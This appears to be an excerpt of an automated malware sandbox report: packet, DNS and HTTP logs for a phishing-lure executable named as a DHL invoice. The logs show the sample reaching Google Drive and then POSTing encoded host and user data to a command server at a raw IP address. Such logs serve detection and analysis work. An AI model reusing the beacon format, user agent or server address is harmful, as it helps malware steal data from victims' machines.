Aug 10, 2023 19:13:01.204318047 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.204629898 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.204772949 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.204807997 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.204993010 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.205352068 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.205627918 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.205676079 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.205904961 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.206084967 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.206310034 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.206350088 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.206605911 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.206715107 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.206918955 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.206952095 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.207165003 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.207427979 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.207609892 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.207648993 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.207894087 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.207926035 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.208065987 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.208266973 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.208437920 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.208509922 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.208668947 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.208673954 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.208718061 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.208880901 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.208952904 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.209176064 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.209204912 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.209279060 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.209342003 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.209433079 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.209470987 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.209495068 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.209661961 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.209661961 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.210083008 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.210258961 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.210328102 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.210477114 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.210587978 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.210664034 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.210715055 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.210870028 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.210941076 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.211095095 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.211213112 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.211289883 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.211339951 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.211524963 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.211755037 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.211913109 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.211946011 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.212177992 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.212208033 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.212241888 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.212338924 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.212495089 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.212682962 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.212873936 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.212910891 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.213115931 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.213157892 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.213229895 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.213269949 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.213455915 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.213529110 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.213685989 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.213736057 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.213887930 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.213891983 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.213927984 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.214210987 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.214355946 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.214521885 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.214592934 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.214773893 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.214796066 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.214869022 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.214931965 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.215091944 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.215145111 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.215358973 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.215426922 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.215584040 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.215645075 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.215847015 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.215929985 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.215970993 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:01.216125011 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.216193914 CEST	49831	443	192.168.11.20	142.250.186.129
Aug 10, 2023 19:13:01.216253996 CEST	443	49831	142.250.186.129	192.168.11.20
Aug 10, 2023 19:13:02.272876024 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:02.380306959 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:02.380544901 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:02.382054090 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:02.489248991 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:02.489600897 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:02.596802950 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.427599907 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.427669048 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.427721977 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.427772045 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.427820921 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.427874088 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.427922010 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.427947998 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.427975893 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.428085089 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.428138971 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.428150892 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.428150892 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.428318024 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.428425074 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.535186052 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.535213947 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.535409927 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.538939953 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.538965940 CEST	80	49832	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.539165020 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.539165020 CEST	49832	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.576242924 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.682694912 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.682907104 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.684720039 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.791018009 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:03.791256905 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:03.897645950 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.683998108 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.684021950 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.684159994 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.684180021 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.684207916 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.684210062 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.684222937 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.684283018 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.684345961 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.684413910 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.684421062 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.684428930 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.684441090 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.684519053 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.684576988 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.684576988 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.684617043 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.790899038 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.790915012 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.791232109 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.795033932 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.795048952 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.795253992 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.802194118 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.802207947 CEST	80	49833	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.802428961 CEST	49833	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.871328115 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.978295088 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:04.978473902 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:04.980323076 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:05.087609053 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.087743044 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:05.194546938 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.976514101 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.976946115 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:05.982523918 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.982600927 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.982659101 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.982713938 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.982769012 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.982789993 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:05.982825041 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.982850075 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:05.982851028 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:05.982881069 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.982937098 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.982939959 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:05.982988119 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:05.982995033 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:05.983045101 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:05.983093023 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:05.983191013 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:06.083982944 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:06.084053040 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:06.084093094 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:06.084098101 CEST	80	49835	216.128.145.196	192.168.11.20
Aug 10, 2023 19:13:06.084196091 CEST	49835	80	192.168.11.20	216.128.145.196
Aug 10, 2023 19:13:06.084275961 CEST	49835	80	192.168.11.20	216.128.145.196

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 10, 2023 19:13:00.110794067 CEST	57692	53	192.168.11.20	1.1.1.1
Aug 10, 2023 19:13:00.119736910 CEST	53	57692	1.1.1.1	192.168.11.20
Aug 10, 2023 19:13:00.728694916 CEST	52048	53	192.168.11.20	1.1.1.1
Aug 10, 2023 19:13:00.772243023 CEST	53	52048	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 10, 2023 19:13:00.110794067 CEST	192.168.11.20	1.1.1.1	0x7f57	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Aug 10, 2023 19:13:00.728694916 CEST	192.168.11.20	1.1.1.1	0x737a	Standard query (0)	doc-0s-3o-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 10, 2023 19:13:00.119736910 CEST	1.1.1.1	192.168.11.20	0x7f57	No error (0)	drive.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Aug 10, 2023 19:13:00.772243023 CEST	1.1.1.1	192.168.11.20	0x737a	No error (0)	doc-0s-3o-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 10, 2023 19:13:00.772243023 CEST	1.1.1.1	192.168.11.20	0x737a	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.129	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-0s-3o-docs.googleusercontent.com

216.128.145.196

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49830	142.250.181.238	443	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49831	142.250.186.129	443	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49832	216.128.145.196	80	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Timestamp	kBytes transferred	Direction	Data
Aug 10, 2023 19:13:02.382054090 CEST	140	OUT	POST /~wellseconds/?p=43026970 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 216.128.145.196 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E82E0162 Content-Length: 178 Connection: close
Aug 10, 2023 19:13:02.489600897 CEST	140	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: 'ckav.ruArthur841618W1064_038k028278665D4ACB73EF64D459APyqUy
Aug 10, 2023 19:13:03.427599907 CEST	142	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Aug 2023 17:13:02 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://216-128-145-196.cprapid.com/~wellseconds/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 65 6c 6c 20 53 65 63 6f 6e 64 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 65 6c 6c 20 53 65 63 6f 6e 64 73 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 32 31 36 2d 31 32 38 2d 31 34 35 2d 31 39 36 2e 63 70 72 61 70 69 64 2e 63 6f 6d 5c 2f 7e 77 65 6c 6c 73 65 63 6f 6e 64 73 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 33 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 Data Ascii: <!doctype html><html lang="en-US" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page not found – Well Seconds</title><meta name='robots' content='noindex, nofollow' /><link rel='dns-prefetch' href='//216-128-145-196.cprapid.com' /><link rel="alternate" type="application/rss+xml" title="Well Seconds » Feed" href="http://216-128-145-196.cprapid.com/~wellseconds/feed/" /><link rel="alternate" type="application/rss+xml" title="Well Seconds » Comments Feed" href="http://216-128-145-196.cprapid.com/~wellseconds/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/216-128-145-196.cprapid.com\/~wellseconds\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.3"}};/*! This file
Aug 10, 2023 19:13:03.427669048 CEST	143	IN	Data Raw: 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 Data Ascii: is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.f
Aug 10, 2023 19:13:03.427721977 CEST	144	IN	Data Raw: 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f Data Ascii: o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports"
Aug 10, 2023 19:13:03.427772045 CEST	146	IN	Data Raw: 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 Data Ascii: ngExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n
Aug 10, 2023 19:13:03.427820921 CEST	147	IN	Data Raw: 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d Data Ascii: gn:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.
Aug 10, 2023 19:13:03.427874088 CEST	148	IN	Data Raw: 6f 63 6b 2d 67 72 6f 75 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69 Data Ascii: ock-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}
